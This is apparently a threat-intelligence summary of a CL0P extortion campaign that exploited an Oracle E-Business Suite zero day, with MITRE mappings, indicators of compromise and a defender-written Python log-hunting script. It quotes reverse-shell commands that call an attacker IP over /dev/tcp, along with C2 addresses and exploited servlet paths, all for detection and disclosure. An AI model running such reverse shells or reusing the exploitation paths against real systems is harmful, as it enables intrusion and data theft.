CL0P Oracle EBS Zero Day Extortion Attack

Google Threat Intelligence Group and Mandiant tracked a large-scale CL0P-branded extortion campaign that leveraged zero-day exploitation of Oracle E-Business Suite (EBS), including activity as early as July 2025 and a likely CVE-2025-61882 chain exploited from Aug. 9, 2025. The actors used Java-based in-memory payload chains (GOLDVEIN.JAVA and SAGE* family), sent extortion emails using [email protected]/.net, and exfiltrated data from impacted EBS environments. #CVE-2025-61882 #GOLDVEIN.JAVA

Keypoints

  • Starting Sept 29, 2025, a high-volume extortion email campaign claimed theft of Oracle EBS data and used contact addresses [email protected] and [email protected].
  • GTIG and Mandiant identified exploitation activity targeting Oracle EBS beginning in July 2025, with exploitation of SyncServlet and UiServlet components and likely use of CVE-2025-61882.
  • Threat actors injected malicious XSL templates stored in XDO_TEMPLATES_B (TemplateCode prefixed TMP/DEF) to execute Base64-encoded Java payloads via TemplatePreviewPG requests.
  • Two primary Java-based infection chains observed: GOLDVEIN.JAVA (downloader/beacon) and the SAGE* family (SAGEGIFT → SAGELEAF → SAGEWAVE) enabling in-memory loading, persistence, and remote deployment.
  • Observed C2 and exploitation infrastructure included IPs such as 200.107.207.26 and 161.97.99.49, and GOLDVEIN.JAVA C2 hosts like 162.55.17.215:443 and 104.194.11.200:443.
  • Post-exploitation activity included reconnaissance commands run as the applmgr EBS account and reverse shell connections (example: bash -i >/dev/tcp/200.107.207.26/53).
  • GTIG recommends immediate application of Oct 4 emergency patches, hunting for malicious templates in XDO_TEMPLATES_B/XDO_LOBS, restricting outbound internet access, and memory forensics of Java processes.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Attackers exploited Oracle EBS UiServlet and SyncServlet to achieve remote code execution. Quote: ‘…targeting /OA_HTML/configurator/UiServlet…’ and ‘…initiated with a POST request to /OA_HTML/SyncServlet.’
  • [T1059] Command and Scripting Interpreter – Executed shell commands and reverse shells via bash (e.g., ‘bash -i >& /dev/tcp// 0>&1’) to run reconnaissance and control commands.
  • [T1105] Ingress Tool Transfer – GOLDVEIN.JAVA downloader retrieved second-stage payloads from attacker-controlled C2 servers. Quote: ‘…makes a request back to an attacker-controlled command-and-control (C2 or C&C) IP address to retrieve and execute a second-stage payload.’
  • [T1218] Signed Binary Proxy Execution (Java execution in-memory) – Java-based reflective loaders (SAGEGIFT/SAGELEAF) were used to load and execute payloads in memory rather than from disk. Quote: ‘…custom Java reflective class loader… used to load SAGELEAF, an in-memory dropper…’
  • [T1505] Server Software Component – Malicious Java servlet filters (SAGEWAVE) were installed to persist and filter HTTP requests for payload deployment. Quote: ‘…install SAGEWAVE, a malicious Java servlet filter that allows the actor to deploy an AES-encrypted ZIP archive with Java classes in it.’
  • [T1020] Automated Exfiltration / [T1041] Exfiltration Over C2 Channel – Data exfiltration and command results were returned to actors within HTTP responses (HTML comments) and via outbound C2 connections. Quote: ‘…contains logging functionality that returns the execution result to the actor in the HTTP response, within an HTML comment.’

Indicators of Compromise

  • [IP Address] exploitation and C2 – 200.107.207.26 (observed in UiServlet and SyncServlet exploitation), 161.97.99.49 (observed targeting UiServlet).
  • [IP:Port] GOLDVEIN.JAVA C2 – 162.55.17.215:443, 104.194.11.200:443 (identified as GOLDVEIN.JAVA C2 servers).
  • [HTTP Endpoint] suspicious request paths – /OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG (TemplateCode starting with TMP or DEF indicates malicious template trigger), /OA_HTML/SyncServlet.
  • [Email] extortion contact addresses – [email protected], [email protected] (used in CL0P extortion emails and listed on CL0P DLS).
  • [HTTP Path Substring] SAGEWAVE filter indicators – /help/state/content/destination./navId.1/navvSetId.iHelp/ and /support/state/content/destination./navId.1/navvSetId.iHelp/ (used for request filtering by SAGEWAVE).
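As an added defender-side example (not code from the GTIG report or from Oracle), the following Python walks web access-log lines and flags the request-path, TemplateCode-prefix and IP indicators listed above. It assumes a combined-log-format log and that the template code is passed as a `TemplateCode` query parameter; the sample log lines are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Request paths, path substrings and IPs quoted from the summary above.
PREVIEW_PATH = "/OA_HTML/OA.jsp"
PREVIEW_PAGE = "/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG"
EXPLOIT_PATHS = {"/OA_HTML/configurator/UiServlet", "/OA_HTML/SyncServlet"}
SAGEWAVE_MARKERS = (
    "/help/state/content/destination./navId.1/navvSetId.iHelp/",
    "/support/state/content/destination./navId.1/navvSetId.iHelp/",
)
KNOWN_IPS = {"200.107.207.26", "161.97.99.49"}
# Combined-log-format line: client ip ... [time] "METHOD target HTTP/x" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

def classify(line):
    """Return the indicator tags matched by one access-log line (empty if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    hits = []
    url = urlsplit(m["target"])
    params = parse_qs(url.query)
    # Template preview request whose code carries the TMP/DEF prefix.
    # Assumption: the code is passed as the "TemplateCode" query parameter.
    if url.path == PREVIEW_PATH and PREVIEW_PAGE in params.get("page", []):
        code = params.get("TemplateCode", [""])[0]
        if code.upper().startswith(("TMP", "DEF")):
            hits.append("xdo-template-preview:" + code)
    if url.path in EXPLOIT_PATHS:
        hits.append("exploited-servlet:" + url.path)
    if any(marker in url.path for marker in SAGEWAVE_MARKERS):
        hits.append("sagewave-filter-path")
    if m["ip"] in KNOWN_IPS:
        hits.append("known-actor-ip:" + m["ip"])
    return hits

def hunt(lines):
    # Map 1-based line number -> tags for every line matching at least one indicator.
    return {n: tags for n, line in enumerate(lines, 1) if (tags := classify(line))}

# Constructed sample log lines (not taken from the report), one per indicator plus a benign preview.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Aug/2025:10:00:01 +0000] "GET /OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG&TemplateCode=TMPABC123 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Aug/2025:10:00:02 +0000] "GET /OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG&TemplateCode=INVOICE_EN HTTP/1.1" 200 512',
    '200.107.207.26 - - [10/Aug/2025:10:00:03 +0000] "POST /OA_HTML/SyncServlet HTTP/1.1" 200 77',
    '198.51.100.9 - - [10/Aug/2025:10:00:04 +0000] "GET /support/state/content/destination./navId.1/navvSetId.iHelp/x HTTP/1.1" 200 10',
]
```

A match on the TMP/DEF prefix or the SAGEWAVE path is a hunting lead to confirm against XDO_TEMPLATES_B/XDO_LOBS and Java process memory, not proof of compromise on its own.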

Read more: https://cloud.google.com/blog/topics/threat-intelligence/oracle-ebusiness-suite-zero-day-exploitation